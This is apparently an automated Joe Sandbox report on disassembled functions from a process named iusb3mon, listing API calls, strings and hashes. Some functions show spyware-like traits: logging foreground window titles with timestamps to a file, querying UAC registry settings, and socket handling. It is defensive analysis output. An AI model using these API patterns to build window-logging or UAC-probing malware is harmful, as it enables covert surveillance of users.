Instruction Fuzzy Hash: 65E02271900623BBE2E02B30BC09FCE3B999F09721F040508FB59A5380DB6495048AE7

Function 06CF74A9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,?,06CF79AA,?,?,?), ref: 06CF74B8
GetProcAddress.KERNEL32(00000000), ref: 06CF74BF
GetCurrentProcess.KERNEL32(00000000,?,?,06CF79AA,?,?), ref: 06CF74D3

Strings

kernel32.dll, xrefs: 06CF74B3
IsWow64Process, xrefs: 06CF74AE

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: 3a98a68d1bc76df580d71f872c9ce22c45c1283a071e1a5803b77e4713cc3564
Instruction ID: 123a119d4e65db2327264bc9b8f81fcd993cd7e6ff6daad39ba09bd0c25829bf
Opcode Fuzzy Hash: 3a98a68d1bc76df580d71f872c9ce22c45c1283a071e1a5803b77e4713cc3564
Instruction Fuzzy Hash: D3E09A72C1121AFFDB6097B2E90DADE7FACEB00662B000454FA01E6100E6B0CB048BA0

Function 06CF1B34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06CF1B85), ref: 06CF1B47
GetProcAddress.KERNEL32(00000000), ref: 06CF1B4E
GetCurrentProcess.KERNEL32(00000000,?,?,?,06CF1B85), ref: 06CF1B5E

Strings

kernel32, xrefs: 06CF1B42
IsWow64Process, xrefs: 06CF1B3D

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32
API String ID: 4190356694-3789238822
Opcode ID: 9f758fed51a0b03a13cadf31ea9608f87d429619787bea76220729cf56e802f2
Instruction ID: 0374c92b61481b530daf615d5f60b675e3120511c4190554d47f14fa2ad3099a
Opcode Fuzzy Hash: 9f758fed51a0b03a13cadf31ea9608f87d429619787bea76220729cf56e802f2
Instruction Fuzzy Hash: B9E08C72C5131AFBDB20A7F5EC0EACE7BACDF04611B040981B601E3200D7B4DA08CBA0

Function 06D00312 Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 06D00370
GetFileType.KERNEL32(00000480), ref: 06D0041B
GetStdHandle.KERNEL32(-000000F6), ref: 06D0047E
GetFileType.KERNEL32(00000000), ref: 06D0048C
SetHandleCount.KERNEL32 ref: 06D004C3

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 6bd0acff7b5e65d185408b832f8bfd10b556bb4000b7ed0dd489f69d32db8a1d
Instruction ID: f2bfd88357ff1ef69edbc85b1c5d2b4c1e8eb4fb8e07880d9c26f6f2f2f2262c
Opcode Fuzzy Hash: 6bd0acff7b5e65d185408b832f8bfd10b556bb4000b7ed0dd489f69d32db8a1d
Instruction Fuzzy Hash: 94511731904201AFF7A1CF68C884B697BE1FB2A328F15866CC6A6DB3D1DB30D809D755

Function 06CF7DC3 Relevance: 7.6, APIs: 6, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00002000,00000004,00000000,?,?,?,?,?,06CF36CC,?,?,?,06CF20F0,?), ref: 06CF7DFE
VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,06CF36CC,?,?,?,06CF20F0,?,06D22BD8,?,00000000), ref: 06CF7E0E
GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,06CF36CC,?,?,?,06CF20F0,?,06D22BD8,?,00000000,00000000,?), ref: 06CF7E1F
HeapAlloc.KERNEL32(00000000,?,?,?,06CF36CC,?,?,?,06CF20F0,?,06D22BD8,?,00000000,00000000,?,?), ref: 06CF7E26
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,06CF36CC,?,?,?,06CF20F0,?,06D22BD8,?,00000000), ref: 06CF7E4A
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,06CF36CC,?,?,?,06CF20F0,?,06D22BD8,?,00000000), ref: 06CF7E59

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Alloc$Virtual$Heap$Process
String ID:
API String ID: 2020977634-0
Opcode ID: 469db925c88517a94e13643b5c6fb12cbc1dc826e52c7098fef1470c8822e2f5
Instruction ID: f82a8068eb9f291d0988605d2f67acb8734bad0e21a462810481c4e135fb0f9d
Opcode Fuzzy Hash: 469db925c88517a94e13643b5c6fb12cbc1dc826e52c7098fef1470c8822e2f5
Instruction Fuzzy Hash: 8C315C71A10305AFEBA49FA9DD85FAA7BA8AF08754F10042DF705D7280D7B0E900DBA4

Function 06CF2B0D Relevance: 7.6, APIs: 5, Instructions: 80stringtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00000000,00000258), ref: 06CF2B2F
GetWindowTextA.USER32(00000000,06D220CC,00000400), ref: 06CF2B3D
lstrlenA.KERNEL32(06D220CC), ref: 06CF2B73
GetLocalTime.KERNEL32(?), ref: 06CF2B81
wsprintfA.USER32 ref: 06CF2BB2

Part of subcall function 06CF2A59: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06CF2A71
Part of subcall function 06CF2A59: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06CF2AC4
Part of subcall function 06CF2A59: GetFileSize.KERNEL32(00000000,00000000), ref: 06CF2AD1
Part of subcall function 06CF2A59: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06CF2AE3
Part of subcall function 06CF2A59: lstrlenA.KERNEL32(06CF2DCE,?,00000000), ref: 06CF2AF1
Part of subcall function 06CF2A59: WriteFile.KERNEL32(00000000,06CF2DCE,00000000), ref: 06CF2AFC
Part of subcall function 06CF2A59: CloseHandle.KERNEL32(00000000), ref: 06CF2B03

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Windowlstrlen$CloseCreateFolderForegroundHandleLocalPathPointerSizeSpecialTextTimeWritewsprintf
String ID:
API String ID: 3540613261-0
Opcode ID: aeae3f90dcdec236631050f6ca2d91a9dca754065ee1dfc14ddf9c5893d70d09
Instruction ID: b572e8830a29fe4e70cf8503266329d4561e12f11197ceec9654140798338152
Opcode Fuzzy Hash: aeae3f90dcdec236631050f6ca2d91a9dca754065ee1dfc14ddf9c5893d70d09
Instruction Fuzzy Hash: 58217CB2900129BADBA09BE5DD48FEF77BCAB48305F0004A5F705E2241E6389B44DBB5

Function 06CF7681 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,06CF7870,00000000,00020019,06CF7870,00000000,0000009C,00000000,?,?,06CF7870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06CF769D
RegQueryValueExA.ADVAPI32(06CF7870,?,00000000,80000002,00000000,?,?,?,06CF7870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06CF76BD
RegQueryValueExA.ADVAPI32(06CF7870,?,00000000,00000000,00000000,?,?,?,06CF7870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06CF76E2
RegCloseKey.ADVAPI32(06CF7870,?,?,06CF7870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06CF76F3
RegCloseKey.ADVAPI32(06CF7870,?,?,06CF7870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06CF7700

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$Open
String ID:
API String ID: 4082589901-0
Opcode ID: f979cd4875477c8255f84230374343487a98343fb37c5c08a3673153e6f44111
Instruction ID: efe305dd6fc74b49664f8c551c3ffbd66673c24fe2a2c3c8519f78dea48ed8a6
Opcode Fuzzy Hash: f979cd4875477c8255f84230374343487a98343fb37c5c08a3673153e6f44111
Instruction Fuzzy Hash: C9112875510109BF9F518F56EC44EAF3BBAEF85350B104469FA14D6220EB31AA14EB70

Function 06D09DEB Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06D09DF0
GetClassInfoA.USER32(?,?,?), ref: 06D09E0B
RegisterClassA.USER32(00000004), ref: 06D09E16
lstrcatA.KERNEL32(00000034,?,00000001), ref: 06D09E4D
lstrcatA.KERNEL32(00000034,?), ref: 06D09E5B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 430b617cecbb04f924199d226fa188510caea2ee5c1c0172d26cba7b5bf5a3e7
Instruction ID: 6bc0d1b9cd58f8b8b30a6dc6047c063d52dbf9556e54ce2d865e9745f0a35a8b
Opcode Fuzzy Hash: 430b617cecbb04f924199d226fa188510caea2ee5c1c0172d26cba7b5bf5a3e7
Instruction Fuzzy Hash: 1211A576A15254BEFB90AFB49C40BAE7BB8EF09710F004619E955E7291C770AA048661

Function 06CF13A5 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationnetworkCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF13AA
WaitForSingleObject.KERNEL32(?,000000FF), ref: 06CF13CD
CloseHandle.KERNEL32(?), ref: 06CF13E9
CloseHandle.KERNEL32(?), ref: 06CF13EE
WSACleanup.WS2_32 ref: 06CF13F0

Part of subcall function 06CF180D: setsockopt.WS2_32(?,0000FFFF,00000080,06CF546D,00000004), ref: 06CF1832
Part of subcall function 06CF180D: CancelIo.KERNEL32(?), ref: 06CF183B
Part of subcall function 06CF180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06CF1847
Part of subcall function 06CF180D: closesocket.WS2_32(?), ref: 06CF1850
Part of subcall function 06CF180D: SetEvent.KERNEL32(?), ref: 06CF1859

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
String ID:
API String ID: 1476891362-0
Opcode ID: b8b3da2103ebeade88a96b40b2c963e41be202c160a100ff6bd8f43af679146e
Instruction ID: 57e311e1c06c20dd8bac50bf52bbf8111df7105021ed92b942bdf76568248ddf
Opcode Fuzzy Hash: b8b3da2103ebeade88a96b40b2c963e41be202c160a100ff6bd8f43af679146e
Instruction Fuzzy Hash: C00104304216D0DFD7A1EB64CD0479DBBF4AF00360F240A0CD1A213BD0CBB1AA08EB51

Function 06CFCDA1 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,06CFDE63,06CFDDE8,00000000,06CFB401,00000000,00000000,00000000,?,06CF8D56,?,?,06CF8CE2,?,?), ref: 06CFCDA3
TlsGetValue.KERNEL32(?,06CF8D56,?,?,06CF8CE2,?,?,?), ref: 06CFCDB1
SetLastError.KERNEL32(00000000,?,06CF8D56,?,?,06CF8CE2,?,?,?), ref: 06CFCDFD

Part of subcall function 06D0005D: HeapAlloc.KERNEL32(00000008,06CF8D56,00000000,00000000,00000000,00000000,00000000,?,06CF8D56,?,?,06CF8CE2,?,?,?), ref: 06D00153

TlsSetValue.KERNEL32(00000000,?,06CF8D56,?,?,06CF8CE2,?,?,?), ref: 06CFCDD5
GetCurrentThreadId.KERNEL32 ref: 06CFCDE6

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 9514044f64ac2c71de6c8406dd734df55dec3141730c15e48288b6d847e5f74d
Instruction ID: 6f98801cfb51c268b5c778ec3d8e79f04a79629d32d42ba2668ee20bbefedec5
Opcode Fuzzy Hash: 9514044f64ac2c71de6c8406dd734df55dec3141730c15e48288b6d847e5f74d
Instruction Fuzzy Hash: F4F06231A50612ABE6B12B24B80871B7F66FB417A1B000A29F765A63C0CF6084019791

Function 06CFCF88 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,?,?,06CFCD75,06CFB68C,06CFB6E5,?,?,?), ref: 06CFCFBC

Part of subcall function 06CFB2B4: HeapFree.KERNEL32(00000000,00000000,00000000,06CF8D56,00000000,?,06D00113,00000009,00000000,00000000,00000000,00000000,00000000,?,06CF8D56,?), ref: 06CFB388

DeleteCriticalSection.KERNEL32(?,?,06CFCD75,06CFB68C,06CFB6E5,?,?,?), ref: 06CFCFD7
DeleteCriticalSection.KERNEL32 ref: 06CFCFDF
DeleteCriticalSection.KERNEL32 ref: 06CFCFE7
DeleteCriticalSection.KERNEL32 ref: 06CFCFEF

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection$FreeHeap
String ID:
API String ID: 447823528-0
Opcode ID: 8bcf97a5e7ca5991c96665683c9d73ebae5b1bbde64085d9fb9ba819c6894254
Instruction ID: edcc4e2de9ec6bbbf7af8d880bd44569d5db1f3ed8e23145ad7ec1acf8b07ac9
Opcode Fuzzy Hash: 8bcf97a5e7ca5991c96665683c9d73ebae5b1bbde64085d9fb9ba819c6894254
Instruction Fuzzy Hash: 75F08933F141D8779AFD771AFC4884AEB569FC03603160039EE545A370C5624E41DA84

Function 06CF180D Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,06CF546D,00000004), ref: 06CF1832
CancelIo.KERNEL32(?), ref: 06CF183B
InterlockedExchange.KERNEL32(?,00000000), ref: 06CF1847
closesocket.WS2_32(?), ref: 06CF1850
SetEvent.KERNEL32(?), ref: 06CF1859

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: fa29a3936136398aa4baffe3b35cbc54f68e46923087e6999a51bedb30d3d5ee
Instruction ID: 8dbdc67f447cb467d97451bf15cf34e88a57b0e21a4133add87ecf31d5757121
Opcode Fuzzy Hash: fa29a3936136398aa4baffe3b35cbc54f68e46923087e6999a51bedb30d3d5ee
Instruction Fuzzy Hash: BBF0D031400715FFE7209B95DC0AB9A7BB9FF04314F104958A792916E0D7B2A9489B50

Function 06D0CAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 06D0CACC
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 06D0CB7B
LoadBitmapA.USER32(00000000,00007FE3), ref: 06D0CB93

Strings

, xrefs: 06D0CADB

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: a19020209f712e0c07f2e25441040048b355c70f7664e33c074b10ee39185e65
Instruction ID: 2a9be9c6e47a03ed135613a702a76859fef5cde101c7919a52260e298fbfe1fb
Opcode Fuzzy Hash: a19020209f712e0c07f2e25441040048b355c70f7664e33c074b10ee39185e65
Instruction Fuzzy Hash: 92210771E00219AFFB20CB78DC85BAEBBB9EF44711F1546A5E615EB2C1D7709648CB80

Function 00C01F90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00C0202F

Part of subcall function 00C06F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C011FC,?,?,?,?,00C011FC,?,00C2A814), ref: 00C06F94

Strings

ios_base::eofbit set, xrefs: 00C01FD6
ios_base::badbit set, xrefs: 00C01FC7, 00C01FF2, 00C02013
ios_base::failbit set, xrefs: 00C01EC8, 00C01FD1

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: d30c81d5efafe8a80d0008ad38a77f04425d5153a1c300508ccfb8f905e15420
Instruction ID: f04590caa3a1515d491ac48198abedcbbf7f2bbf0479a1dbf335b0be51bcae5a
Opcode Fuzzy Hash: d30c81d5efafe8a80d0008ad38a77f04425d5153a1c300508ccfb8f905e15420
Instruction Fuzzy Hash: 0811E7B29107156BCB10DF98D802B96F3DCEF15310F18852AFE54C7AC1EB70A954DB91

Function 06CF4E65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56sleepfileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06CF4E9D
DeleteFileA.KERNEL32(?), ref: 06CF4EE0
Sleep.KERNEL32(000007D0), ref: 06CF4F0F

Part of subcall function 06CF4D89: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06CF4DBD
Part of subcall function 06CF4D89: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06CF4E10
Part of subcall function 06CF4D89: GetFileSize.KERNEL32(00000000,00000000), ref: 06CF4E21
Part of subcall function 06CF4D89: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06CF4E3C
Part of subcall function 06CF4D89: CloseHandle.KERNEL32(?), ref: 06CF4E59

Strings

.dat, xrefs: 06CF4ECB

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

